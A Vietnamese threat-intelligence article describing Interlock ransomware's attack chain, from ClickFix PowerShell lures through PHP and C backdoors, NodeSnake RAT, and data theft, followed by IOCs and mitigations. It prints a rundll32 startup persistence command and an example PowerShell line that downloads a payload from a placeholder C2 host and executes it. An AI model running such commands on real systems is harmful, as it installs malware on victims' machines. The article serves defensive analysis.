Nhóm ransomware Interlock đã được xác định là tác nhân đằng sau một loạt sự cố an ninh mạng phức tạp. Các cuộc tấn công này đã nhắm mục tiêu vào nhiều công ty tại Bắc Mỹ và Châu Âu. Thông tin này được tiết lộ trong một báo cáo chuyên sâu công bố vào tháng 7 năm 2025 bởi Đơn vị Phản ứng Đe dọa (TRU) của eSentire.
Nhóm ransomware Interlock đã hoạt động từ tháng 9 năm 2024. Chúng triển khai một chuỗi tấn công đa giai đoạn tinh vi nhằm đạt được mục tiêu xâm nhập và mã hóa dữ liệu.
Chuỗi Tấn Công Ban Đầu của Ransomware Interlock
Khởi đầu và Kỹ thuật Social Engineering
Chuỗi tấn công bắt đầu bằng việc khai thác các website đã bị xâm nhập, điển hình như Kongtuke. Những trang web này được sử dụng để chuyển hướng nạn nhân đến các trang ClickFix giả mạo.
Đây là một chiến thuật social engineering tinh vi. Kẻ tấn công lừa người dùng sao chép và thực thi các lệnh PowerShell độc hại. Các lệnh này được ngụy trang dưới dạng giải pháp sửa lỗi kỹ thuật, dẫn đến các thông báo lỗi giả mạo. Mục đích là che giấu quá trình lây nhiễm ngầm bên dưới.
Một ví dụ về tài liệu tham khảo cho kỹ thuật PowerShell độc hại này có thể tìm thấy trên gbhackers.com, minh họa cách thức mà kẻ tấn công tận dụng lòng tin người dùng.
Giai đoạn Do Thám và Xác định Môi Trường
Sau khi được thực thi, lệnh PowerShell khởi tạo một download cradle. Download cradle này sẽ tải về các payload bổ sung từ các máy chủ chỉ huy và kiểm soát (C2).
Một trong những máy chủ C2 được ghi nhận là dng-microsoftds.com. Sau khi kết nối, hệ thống của nạn nhân sẽ được fingerprinted bằng các lệnh như systeminfo. Dữ liệu do thám này sau đó được gửi về C2 để phân tích, đặc biệt là kiểm tra sự hiện diện của môi trường ảo hóa hoặc sandbox.
Nếu môi trường được đánh giá là an toàn (không phải sandbox), cuộc tấn công sẽ tiếp tục. Payload tiếp theo là một binary có tên “Simple Process Launcher”, thường được đặt tên là c2.exe.
Triển Khai Payload và Cơ Chế Duy Trì
“Simple Process Launcher” và Duy Trì Quyền Truy Cập
Binary c2.exe được duy trì bằng cách tạo một shortcut Windows trong thư mục khởi động (startup folder). Kẻ tấn công thực thi nó bằng cách sử dụng công cụ LOLBin (Living Off The Land Binary) rundll32 với hàm xuất ShellExec_RunDLL của shell32.dll.
rundll32.exe shell32.dll,ShellExec_RunDLL "C:\Users\Public\Start Menu\Programs\Startup\c2.lnk"
Launcher này tiếp tục tạo ra các tiến trình PowerShell khác. Các tiến trình này có nhiệm vụ tải xuống và gọi các script bị che giấu (obfuscated), cuối cùng cài đặt một trình thông dịch PHP.
Backdoor PHP và Khả Năng Vận Hành
Trình thông dịch PHP được sử dụng để chạy một backdoor PHP đã bị che giấu rất kỹ. Backdoor này được lưu trữ dưới dạng tệp config.cfg trong thư mục AppData. Backdoor PHP hoạt động như một trình xử lý lệnh đa năng, hỗ trợ nhiều hoạt động độc hại:
- Thực thi các lệnh tùy ý thông qua
proc_open. - Tải xuống và chạy các tệp DLL hoặc EXE được ngụy trang dưới dạng tệp PNG.
- Cài đặt NodeJS để triển khai các payload JavaScript, chẳng hạn như NodeSnake RAT. Tham khảo thêm về cách thức hoạt động của NodeSnake RAT qua bài viết từ GBHackers.
- Thiết lập cơ chế duy trì (persistence) thông qua các khóa Run trong Registry.
Ví dụ về lệnh PowerShell để tải và thực thi:
(New-Object System.Net.WebClient).DownloadFile('http://malicious.c2/payload.png', 'C:\Users\Public\malicious.exe'); Start-Process 'C:\Users\Public\malicious.exe'
Mã Độc NodeSnake RAT và Đánh Cắp Dữ Liệu
eSentire TRU đã quan sát thấy ransomware Interlock sử dụng backdoor này để triển khai NodeSnake RAT. NodeSnake RAT được dùng để trích xuất dữ liệu nhạy cảm. Các tệp nhạy cảm được mã hóa Base64 và dàn dựng trong thư mục C:\Users\Public dưới dạng tệp .log.
Đồng thời, mã độc thu thập một lượng lớn thông tin chi tiết về hệ thống. Bao gồm thông tin ổ đĩa, danh sách tiến trình và giao diện mạng. Các truy vấn PowerShell được sử dụng để thu thập dữ liệu này, sau đó được chuyển đổi sang định dạng JSON.
Cơ Chế Mã Hóa Dữ Liệu của Ransomware Interlock
Việc mã hóa dữ liệu liên quan đến việc sử dụng khóa XOR 32-bit được tạo bằng thuật toán Mersenne Twister. Các hoạt động XOR lặp lại được thực hiện trên dữ liệu gốc trước khi nén GZip và truyền tải đến các URL C2 được tạo động, có các thành phần đường dẫn ngẫu nhiên.
Backdoor C-based và Giao Tiếp C2
Sau các giai đoạn trên, một backdoor C-based đã được đóng gói, được thả xuống dưới dạng tệp .png và thực thi qua rundll32. Backdoor này tiếp quản quá trình tấn công bằng cách sử dụng các kỹ thuật tự tiêm (self-injection) để tránh bị phát hiện.
Backdoor này bao gồm các máy chủ C2 được mã hóa cứng như 167.235.235.151 và các cơ chế dự phòng, lưu trữ các bản sao lưu đã mã hóa trong %temp%\hiskeow.tmp.
Khả Năng của Backdoor C-based
Backdoor này hỗ trợ các reverse shell bằng cách chuyển hướng đầu vào/đầu ra của cmd.exe qua các socket TCP 443. Nó cũng có khả năng tự xóa bằng cách sử dụng các DLL nhúng được khởi chạy với rundll32. Việc thực thi lệnh được ghi lại đầu ra vào các tệp có dấu thời gian trong C:\Users\Public.
Các lệnh được thực thi bao gồm nhiều kỹ thuật lẩn tránh như giải phóng bộ nhớ và tạm dừng, cũng như cập nhật động các máy chủ C2. Tất cả các giao tiếp được mã hóa bằng khóa XOR từ rand() được khởi tạo và được đặt tiền tố với các đánh dấu như “55 11 69 DF” cho các dấu vân tay hệ thống định dạng JSON.
Độ Phức Tạp của Cuộc Tấn Công Ransomware Interlock
Sự phức tạp của cuộc tấn công thể hiện rõ qua cây tiến trình khổng lồ mà nó tạo ra. Cây tiến trình này bao gồm các dòng lệnh bất thường, việc lặp lại việc sử dụng các công cụ LOLBins, và các công cụ tùy chỉnh cho mục đích do thám, duy trì quyền truy cập và trích xuất dữ liệu.
Tất cả các giai đoạn này cuối cùng đều dẫn đến việc triển khai mã độc ransomware.
Phân tích của TRU nhấn mạnh việc nhóm ransomware Interlock sử dụng các công cụ tùy chỉnh, bao gồm “Interlock RAT” – một tên gọi sai lệch cho một backdoor chức năng chủ yếu với sự hỗ trợ cho chín lệnh cốt lõi. Báo cáo chi tiết của eSentire về hoạt động của nhóm có thể được tìm thấy tại: Unmasking Interlock Group’s Evolving Malware Arsenal.
Chỉ Số Lây Nhiễm (IOCs)
Các chỉ số lây nhiễm (Indicators of Compromise – IOCs) liên quan đến nhóm ransomware Interlock bao gồm:
- Tên miền C2:
dng-microsoftds.com - Địa chỉ IP C2:
167.235.235.151 - Tên tệp độc hại:
c2.exe,config.cfg(backdoor PHP),hiskeow.tmp - Đường dẫn tệp:
C:\Users\Public(nơi dàn dựng dữ liệu, tệp .log),%temp%\hiskeow.tmp - Công cụ LOLBin được sử dụng:
rundll32,PowerShell
Biện Pháp Giảm Thiểu và Phòng Chống Các Mối Đe Dọa Mạng
Để giảm thiểu các mối đe dọa mạng như tấn công của ransomware Interlock, các tổ chức cần triển khai các biện pháp phòng ngừa và phát hiện chủ động. Việc giám sát chặt chẽ các hành vi bất thường là yếu tố then chốt để phát hiện xâm nhập sớm.
Các Biện Pháp Kỹ Thuật Chính
- Giám sát PowerShell: Theo dõi các phiên thực thi PowerShell đáng ngờ, đặc biệt là những lệnh tải xuống hoặc thực thi payload từ các nguồn không xác định.
- Kiểm soát Rundll32: Phát hiện việc sử dụng
rundll32bất thường, đặc biệt khi nó được dùng để khởi chạy các tệp hoặc DLL không quen thuộc. - Phát hiện PHP/NodeJS bất thường: Cảnh báo khi có các cài đặt PHP hoặc NodeJS không mong muốn trên các hệ thống không nên có chúng.
- Phát hiện hành vi: Áp dụng các giải pháp phát hiện hành vi để nhận diện các vectơ social engineering như ClickFix, nơi người dùng bị lừa thực hiện các hành động độc hại.
Chiến Lược Chủ Động
eSentire TRU nhấn mạnh tầm quan trọng của việc săn lùng mối đe dọa (threat hunting) chủ động và phản ứng nhanh chóng. Trung tâm Điều hành An ninh (SOC) 24/7 của họ đạt được thời gian trung bình để khống chế (Mean Time To Contain – MTTC) là 15 phút. Điều này cho thấy sự cần thiết của các dịch vụ phát hiện và phản hồi được quản lý (Managed Detection and Response – MDR) để đối phó với các chiến thuật ransomware Interlock và các biến thể ransomware đang phát triển.
Những khám phá này bổ sung vào lịch sử các vụ khai thác nổi tiếng của nhóm ransomware Interlock. Chúng củng cố tầm quan trọng của các lớp phòng thủ đa tầng. Việc này đặc biệt quan trọng để chống lại các cuộc tấn công dựa trên danh tính và các cuộc tấn công chuỗi cung ứng. Nâng cao bảo mật mạng là một nỗ lực liên tục và cần sự phối hợp toàn diện.
